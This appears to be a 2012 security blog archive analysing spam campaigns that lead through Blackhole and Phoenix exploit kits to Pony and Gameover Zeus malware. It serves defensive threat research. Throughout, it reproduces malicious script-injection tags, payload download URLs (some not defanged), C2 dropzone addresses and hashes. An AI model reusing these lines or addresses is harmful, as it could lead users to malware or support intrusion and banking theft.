Tag Archives: Zeus

Twitter received a request to reset the password for your account.

We analyzed following malicious URL which is used in Twitter themed spam on May 17 2012:

hxxp://lakshmiparthasarathyathreya.com/nwFzPsjZ/index.html

Twitter - Reset Password

This malicious page contained 4 javascripts as shown below:

<script type=”text/javascript” src=”hxxp://www.houard.eu/D2ec6Q6S/js.js”></script>
<script type=”text/javascript” src=”hxxp://egerak.ipislam.edu.my/vp0BYhy2/js.js”></script>
<script type=”text/javascript” src=”hxxp://hardinggraphics.com/ZRRV8K9w/js.js”></script>
<script type=”text/javascript” src=”hxxp://portaldomarmoreegranito.com.br/69zecvvX/js.js”></script>

Eventually these malicious JS redirects victim to a Blackhole Exploit kit at hxxp://69.194.192.218/showthread.php?t=d7ad916d1c0396ff

BlackHole kit first droppes Pony from the following location:

hxxp://69.194.192.218/q.php?f=ba33e&e=4
File: readme.exe
MD5: cc696f9ac857c59be3940791f1dfa9c1
Size: 99,808 bytes

Pony downloader posts to its dropzone at hxxp://50.57.121.196/pony/gate.php. It was also configured to download 2 identical Gameover Zeus payloads from following locations:

1. hxxp://hosting1554269.az.pl/j5EGyoC.exe
2. hxxp://spiritfinancial.net/JqLBEaNt.exe

Gameover installes in %APPDATA%\Micyu\viunbu.exe

MD5: 1a518087bc0cbc1efd869012b2b1a7bd
Size: 3,05,120 bytes
Timestamp: 2010:10:29 20:57:49+02:00
Signature: This file is digitally signed by ‘gHA6’
Certificate Validity: 05/16/2012 to 01/01/2040

This Gameover Zeus variant posts to a dropzone at 189.78.66.155:29620. Webinjects were downloaded from 87.23.103.64:19802. The Gameover variant had a botid of “NRm18”.

As we have been seeing for past few weeks, Pony Downloader and Gameover Zeus both payloads share same file properties indicating both these payloads were built by same group/people, around same time(?):

Signature: This file is digitally signed by ‘gHA6’
Certificate Validity: 05/16/2012 to 01/01/2040
Company Name: bhq93888888888 Corporation
File Description: CTF Loader
Internal Name: CTFMON
Legal Copyright: © bhq93888888888 Corporation. All rights reserved.
Original Filename: CTFMON.EXE
Product Name: bhq93888888888® Windows® Operating System
Product Version: 6.1.7600.16385
Ole Self Register: D

Advertisements

Zeus v2.0.8.9 being rolled out on IRS themed spam

We analyzed following malicious attachement which was distributed with IRS themed spam May 14 2012:

Name: Plexer_Order-z9284
MD5: e807511362923762da627599daeeba65
Size: 21,54,749 bytes
Content: Plexer_Order-z9284.exe

This zip archive contained the following malicious dropper:

Name: Plexer_Order-z9284.exe
MD5: 3c8b1a1c45fbb93e93dbde75795c21bd
Size: 21,84,348 bytes
Timestamp: 1970:01:01 01:00:49+01:00
Company Name: NEW ORDER 2012 FOR VIEW PLEXR
File Description: Win32 Cabinet Self-Extractor
File Version: 9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
Internal Name: Wextract
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: WEXTRACT.EXE .MUI
Product Name: Plexer Order Viewer 2012
Product Version: 56.0.89.3
Comments: NEW VERSION ORDER 2012 FOR VIEW PLEXR
Website: http://www.avira.com
Packager: Xenocode Postbuild 2009 for .NET Beta
Packager Version: 7.0.162

This dropper first installs Google Talk on the system and brings Google Talk window on top of desktop. Behind the scene, it installs Zeus v2.0.8.9. Zeus was intalled in %APPDATA%/[random]/emta.exe and had following file properties:

Name: emta.exe
MD5: bbdeabff13e565e187e0e85fcb1e732f
Size: 95,744 bytes
Tmestamp: 2011:07:27 04:06:30+02:00

Like normal Zeus, it first downloads configuration file consisting of targetlist and webinjects from:

hxxp://kmginsights.com/upload/LoadhandlerImages_/y/config.bin

Zeus dropzone was also running on same domain at:

hxxp://kmginsights.com/upload/LoadhandlerImages_/y/gate.php

This Zeus controller was running on a compromised website of KMG INSIGHTS who offers a complete line of marketing, technology and organizational consulting services.

Russian, Spanish, Italian and UK banks and financial institutions were on the target of this Zeus controller.

ACH Transfer Rejected

We analyzed following malicious URL which is used in ACH spam on April 25 2012:

hxxp://ft000267.ferozo.com/HbusWmxz/index.html

ACH Transfer rejected

This malicious page contained 4 javascripts as shown below:

<script type=”text/javascript” src=”hxxp://crowclub.ca/nRDnUrDq/js.js”></script>
<script type=”text/javascript” src=”hxxp://zadar.hr/aAyhw3ey/js.js”></script>
<script type=”text/javascript” src=”hxxp://giupban24h.com/v3NcYEV4/js.js”></script>
<script type=”text/javascript” src=”hxxp://pacilg.org/RaQhf32L/js.js”></script>

Eventually these malicious JS redirects victim to a Blackhole Exploit kit at hxxp://216.119.142.235/showthread.php?t=34c79594e8b8ac0f

BlackHole kit first droppes Pony from the following location:

hxxp://216.119.142.235/q.php?f=2fcad&e=2
File: contacts.exe
MD5: 242e28a23fbea9dc1e1939eea326a0d2
Size: 1,10,176 bytes

Pony downloader posts to its dropzone at 91.121.84.204/pony/gate.php. It was also configured to download 2 identical Gameover Zeus payloads from following locations:

1. hxxp://power-tec.sk/D8aoPu86/XPVqAGE.exe
2. hxxp://valuemerge.com/aXS0mRNT/KXj.exe

Gameover was installed in %APPDATA%\Ucnye\azufyv.exe

MD5: 647c62cd30f6fb4ea00e8829359b0a82
Size: 2,74,016 bytes
Timestamp: 2010:11:03 14:49:13+01:00
Signature: This file is digitally signed by ‘tNzquyHloA4n3FFctsvudWw7x’
Certificate Validity: 04/24/2012 to 01/01/2040

This Gameover Zeus variant posts to a dropzone at 89.44.245.126:17711. Webinjects were downloaded from 64.60.155.138:21835. The Gameover variant had a botid of “mf222a25″ and cid of “3005″.

Fwd: Scan from a Hewlett-Packard ScanJet #468974

We analyzed following malicious URLs which are used in HP Scan spams:

hxxp://eksitonas.lt/KzHz5BzZ/index.html
hxxp://casagustosa.gr/zo799HVs/index.html

This malicious page contained 3 javascripts as shown below

hxxp://yasonrafilm.com/ZAsUDjH1/js.js
hxxp://lsdkft.hu/bC1BxCbJ/js.js
hxxp://www.aafaq.ca/sxuvf5jV/js.js

Eventually these malicious JS redirects victim to a Blackhole Exploit kit at hxxp://208.117.43.8/showthread.php?t=34c79594e8b8ac0f

BlackHole kit first droppes Pony from the following location:

hxxp://208.117.43.8/q.php?f=2fcad&e=2
File: about.exe
MD5: 9b196853650fcb8ac182be05b627f07c
Size: 1,10,688 bytes

Pony downloader posts to its dropzone at 91.121.84.204/pony/gate.php. It was also configured to download 4 identical Gameover Zeus payloads from following locations:

1. hxxp://power-tec.sk/D8aoPu86/XPVqAGE.exe
2. hxxp://synergieassurance.com/AnJVfWxx/aFa.exe
3. hxxp://20272.w72.wedos.net/w7y74z3H/Hzt.exe
4. hxxp://electrosa.com/8zvW2XE.exe

Gameover was installed in %APPDATA%\Ociw\ilji.exe

MD5: 80bd579d484ac4742b75952fb1a2d694
Size: 2,74,016 bytes
Timestamp: 2010:11:03 04:51:09+01:00
Signature: This file is digitally signed by ‘tNzquyHloA4n3FFctsvudWw7x’
Certificate Validity: 04/24/2012 to 01/01/2040

This Gameover Zeus variant posts to a dropzone at 86.35.218.231:17554. Webinjects were downloaded from 189.78.203.103:29161. The Gameover variant had a botid of “MF222a24″ and cid of “3005″.

IRS spams

We analyzed following malicious URLs which we believe are used in IRS spams:

hxxp://9×18.com/1FrYnHUV/index.html
hxxp://9×18.com/6GkXis2t/index.html
hxxp://9×18.com/7zSj5u8N/index.html
hxxp://9×18.com/9sfGpVaP/index.html
hxxp://9×18.com/DcXTY95c/index.html
hxxp://9×18.com/EdVTFHRy/index.html
hxxp://9×18.com/H37jjL6S/index.html
hxxp://9×18.com/JLdSGm4e/index.html
hxxp://9×18.com/KirxGAkT/index.html
hxxp://9×18.com/M7vrQsUT/index.html
hxxp://9×18.com/N7kkDdho/index.html
hxxp://9×18.com/U8nC5QAL/index.html
hxxp://9×18.com/Y1aFsgBk/index.html
hxxp://9×18.com/bFdJryZB/index.html
hxxp://9×18.com/igc6smeH/index.html
hxxp://9×18.com/jUyLton1/index.html
hxxp://9×18.com/pHbH0hzY/index.html
hxxp://9×18.com/rPWsV1Cp/index.html
hxxp://9×18.com/tjUQVqbC/index.html
hxxp://beinsync.in/1FrYnHUV/index.html
hxxp://9×18.com/wVKshGdP/index.html
hxxp://beinsync.in/6GkXis2t/index.html
hxxp://alcopaz.com/1FrYnHUV/index.html
hxxp://beinsync.in/7zSj5u8N/index.html
hxxp://alcopaz.com/6GkXis2t/index.html
hxxp://beinsync.in/9sfGpVaP/index.html

Although 9×18.com was restricting these URL access, other malicious URLs were up and serving the purpose redirecting victim to Blackhole exploit kit through following 3 javascripts:

<script type=”text/javascript” src=”hxxp://anydemo.in/ox8rWBHG/js.js”></script>
<script type=”text/javascript” src=”hxxp://Darsshan.com/8n9SXXoy/js.js”></script>
<script type=”text/javascript” src=”hxxp://www.moverpackermart.com/3F634op7/js.js”></script>

Blackhole kit was running at hxxp://85.25.189.174/showthread.php?t=34c79594e8b8ac0f. It first drops Pony downloader from the following location:

hxxp://85.25.189.174/q.php?f=2fcad&e=2
File: info.exe
MD5: 9b196853650fcb8ac182be05b627f07c
Size: 1,31,168 bytes

Pony downloader posts to its dropzone at 91.121.84.204/pony/gate.php. It was also configured to download 3 identical Gameover Zeus payloads from following locations:

1. hxxp://electrosa.com/8zvW2XE.exe
2. hxxp://arteyciencia.es/AUq5p7Sm/4VLks.exe
3. hxxp://hotelsatmatheran.com/0Pvo9Hnu/EpJbWNWD.exe
4. hxxp://poetesa.ro/0SbvQR5X/5op0.exe

Gameover was installed in %APPDATA%\Enze\izvuo.exe

MD5: 4105a615d658d89e836c125844be5f39
Size: 3,41,600 bytes
Timestamp: 2010:10:31 08:13:32+01:00
Payload Build Time: 2012-04-16 03:12:58

This Gameover Zeus variant posts to a dropzone at 86.124.117.250:16824. Webinjects were downloaded from 125.166.213.114:25137. The Gameover variant had a botid of “MF222a20″ and cid of “5555″.

As we have been nothing here, Pony Downloader and Gameover Zeus both payloads share same properties indicating both these payloads were built by same group/people, around same time(?):

Signature: Digitally signed by ‘wU5sF34khy4k0DMt30RspNOOm’
Certificate Validity: 04/20/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385

ACH Transaction Rejected

The samples we analyzed had a link to a malicious page at hxxp://cayambeturismo.gob.ec/zHyxgRft/index.html & hxxp://doctors.eyes.org/a6qYbbvX/index.html

ACH transaction rejected

This malicious page contained javascript that redirected victims to a Blackhole Exploit kit at

hxxp://85.25.189.174/showthread.php?t=34c79594e8b8ac0f

BlackHole kit first droppes Pony from the following location:

hxxp://85.25.189.174/q.php?f=2fcad&e=2
File: about.exe
MD5: 9b196853650fcb8ac182be05b627f07c
Size: 1,31,168 bytes

Pony downloader posts to its dropzone at 91.121.84.204/pony/gate.php. It was also configured to download 3 identical Gameover Zeus payloads from following locations:

1. hxxp://electrosa.com/8zvW2XE.exe
2. hxxp://arteyciencia.es/AUq5p7Sm/4VLks.exe
3. hxxp://electrosa.com/8zvW2XE.exe
4. hxxp://poetesa.ro/0SbvQR5X/5op0.exe

Gameover was installed in %APPDATA%\Yblaa\duoju.exe

MD5: a898d910ac17e2dc00333a410daeaa68
Size: 3,47,744 bytes
Timestamp: 2010:10:28 19:52:20+02:00

This Gameover Zeus variant posts to a dropzone at 190.200.120.150:17663. Webinjects were downloaded from 210.4.72.124:13525. The Gameover variant had a botid of “mf222a20″ and cid of “5555″.

Again, as noted in past few days Pony Downloader and Gameover Zeus both shared same properties:

Signature: Digitally signed by ‘wU5sF34khy4k0DMt30RspNOOm’
Certificate Validity: 04/20/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385

Scan from a Xerox WorkCentre Pro #315614

The sample we analyzed had a link to a malicious page at http://shopdreambags.com/FD6YBhNw/index.html

Scan from Xerox 315614

This malicious page contained javascript that redirected victims to a Blackhole Exploit kit at

hxxp://184.22.115.24/showthread.php?t=34c79594e8b8ac0f

BlackHole kit first droppes Pony from the following location:

hxxp://184.22.115.24/q.php?f=2fcad&e=2
File: contacts.exe
MD5: ce1e4177bb2605a8637e386c6f7ab737
Size: 1,29,632 bytes

Pony downloader posts to its dropzone at 200.72.183.54//pony/gate.php. It was also configured to download 3 identical Gameover Zeus payloads from following locations:

1. hxxp://poetesa.ro/0SbvQR5X/5op0.exe
2. hxxp://arteyciencia.es/AUq5p7Sm/4VLks.exe
3. hxxp://redman.com.br/zqDQMaNF/SRivXt.exe

Gameover was installed in %APPDATA%\Jysah\gaihyl.exe

MD5: a898d910ac17e2dc00333a410daeaa68
Size: 3,47,744 bytes
Timestamp: 2010:10:31 04:27:18+01:00

This Gameover Zeus variant posts to a dropzone at 187.105.228.200:11752. Webinjects were downloaded from 71.80.237.121:14268. The Gameover variant had a botid of “MF222a19″ and cid of “5555″.

Interestingly, Pony Downloader and Gameover Zeus both shared same properties indicating both these payloads were built by same group/people, around same time(?):

Signature: Digitally signed by ‘VfnHcYKXDLnVlQizT9uLI4yhP’
Certificate Validity: 04/18/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385

VALERIO Pizza Order Confirmation

Order Confirmation

The sample we analyzed had a link to a malicious page at hxxp://printingcheaper.com/page1.htm?XVUU=S1KGEAGODJ8XNNAHB48IE5UHL&ZELSDVH=J0VL2BFPNUITV68G6&ID5TU3=UA0MLSUW5R2R8GC&DT9=MXK3SEKG0JMHDAU0RZAG6P3K&4S0W2E=8MG1P4S5IGNJAPNX87C&G4YO6P6=AEPEC1D5PXXZ&CS66A7F=RNK4RSELG796VIEX0TUYQ8F9&877R2=VGZBG625JCT8Z9O2K&KQA05=5L5TW1IP247&

This malicious page contained javascript that redirected victims to a Phoenix Exploit kit at hxxp://uiwewsecondary.ru:8080/internet/fpkrerflfvd.php
Phoenix kit first drops a CVE-2010-0188 PDF payload from hxxp://uiwewsecondary.ru:8080/internet/kqbzaubpiqxnbn.pdf. PDF file had following properties:

File: kqbzaubpiqxnbn.pdf
MD5: 1b6f367a28de927e6573e803e555a297
Size: 13,163 bytes

Successful exploit in turn handed victims off to second exploit kit at hxxp://poluicenotgo.ru:8080/internet/at.php?i=15. This kit dropped a Pony downloader with following properties:

File: esfwatkocliuyn.exe
MD5: 5726463108bb6f26e6dd54763e85453b
Size: 1,35,264 bytes

Both these phoenix exploit kits are hosted at the following IP addresses on a same fast flux infrastructure:

83.170.91.152
85.214.204.32
88.190.22.72
89.31.145.154
112.78.124.115
125.19.103.198
41.168.5.140
62.85.27.129
173.203.211.157
210.56.23.100
211.44.250.173
216.24.197.66
219.94.194.138

Pony downloader posts to its dropzone at hxxp://dare2dreamz.com/pony/gate.php, hosted at IP address 109.206.180.54. It was also configured to download 3 identical Gameover Zeus payloads from following locations:

1. hxxp://dynolite.eu/7U0ASvP9/AZz.exe
2. hxxp://abbott.u4ria.co.za/HGFg1RHz/MkiZMX.exe
3. hxxp://demircioglubilgisayar.com.tr/qy3kMMxv/VgWqQm4k.exe

Gameover was installed in %APPDATA%\Meizo\ehgea.exe

MD5: a3e56f7ba6cd98b2ac87596daf74e2aa
Size: 3,71,808 bytes
Timestamp: 2010:10:29 14:08:06+02:00

This Gameover Zeus variant posts to a dropzone at 211.73.186.159:28813. Webinjects were downloaded from 76.73.52.11:25362. The Gameover variant had a botid of “MF222a17” and cid of “5555”.

Interestingly, Pony Downloader and Gameover Zeus both shared same properties indicating both these payloads were built by same group/people, around same time(?):

Signature: Digitally signed by ‘VfnHcYKXDLnVlQizT9uLI4yhP’
Certificate Validity: 04/16/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385

NY TRAFFIC TICKET

Malicious URL:
hxxp://partyinthepark.co.za/page4.htm?563H0J=7J7WVK3SIM15NMTA5&SGLU=GPRI34KVG4J9QB&VNOP=DY7VUBIXD4WT&5LEPGN=4IWARW2MUHFT&

NY Traffic Ticket

The text “To Plead Click Here” in spam contained malicious hyperlink which eventually redirects victim to a Phoenix Exploit kit at hxxp://vitalitysomer.ru:8080/pages/glavctkoasjtct.php.

This phoenix kit is hosted at the following IP addresses on a fast flux infrastructure:

83.170.91.152
85.214.204.32
88.190.22.72
89.31.145.154
112.78.124.115
125.19.103.198
41.168.5.140
62.85.27.129
219.94.194.138
210.56.23.100
211.44.250.173

Phoenix controller drops a CVE-2010-0188 PDF exploit from hxxp://vitalitysomer.ru:8080/pages/jnapaqjrezbpj8.pdf. PDF file had following properties:

File: jnapaqjrezbpj8.pdf
MD5: 73a3d52244f68a2eb4254be2f9e9d740
Size: 13,151 bytes

Successful exploit drops a pony downloader on victim machine. This Pony Downloader is downloaded on another Phoenix exploit-kit at hxxp://validatoronmee.ru:8080/pages/dq.php?i=15. This kit is hosted at the same FastFlux infrastructure as vitalitysomer.ru. Pony downloader had following properties:

File: duczdzd.exe
MD5: 392a574415aa24efbb1f7eda3564060d
Size: 1,40,840 bytes
Timestamp: 2012:04:13 23:48:26+02:00

Pony downloader beacons to its dropzone at buyandsmile.atomclick.co/pony/gate.php. It was also configured to download 3 identical Gameover Zeus payloads from following places:

1. avrupamodaevi.com/Rp076wCE/JVB0dU2.exe
2. guidobruscia.it/aPRh4MrM/j0Bxm4C.exe
3. 20rueraspail.be/pBBJkPFK/PwpKbEJm.exe

Gameover installes in %APPDATA%\Wievo\myaxu.exe

MD5: 5210005536c9f3bbcda0149da4ff37c8
Size: 3,13,384 bytes
Timestamp: 2010:11:01 22:21:42+01:00

This Gameover Zeus variant posts to a dropzone at 76.113.104.21:26928, 178.235.0.255:16270. Webinjects were downloaded from 46.35.131.65:20177 & 116.203.3.213:28542. The Gameover variant had a BotID “mf222a15” and CID “2222”.

Interestingly, Pony Downloader and Gameover Zeus both shared same properties indicating both these payloads were built by same group/people, around same time.

Signature: This file is digitally signed by ‘gvpQYV0qr00yndP’
Certificate Validity: 04/13/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385

Important Information About Your Account

The spammers sure are busy. Today, 2012-04-11, we observed a new spam template spoofing communications from BillMeLater.com – a PayPal service. The spam sample we analyzed had a subject line of “Important Information About Your Account”.

The observed sample contained a malicious link to pe04.com.br/gMsyk6kT/index.html. This page contained the following javascript redirector:

<script type=”text/javascript” src=”http://axislegal.com.au/gcq37VtM/js.js”></script&gt;

The above javascript redirected victims to a Blackhole Exploit Kit at http://209.59.219.231/showthread.php?t=d7ad916d1c0396ff.

This kit dropped a number of different exploits including the latest and greatest Java Exploit CVE-2012-0507. This malicious .jar file had the following properties:

File: Klot.jar
Size: 15719
MD5: 26720F0252EB91BB7A326375313651F9

The kit also dropped a Gameover Zeus variant with the following properties:

Size: 301096
MD5: 5CE366E6D7A949552AF10C4DEAF47506

The Gameover variant had a botid of NRa11. The criminals responsible for this campaign utilized a proxy at 200.58.99.114 to control victims infected with this Gameover variant.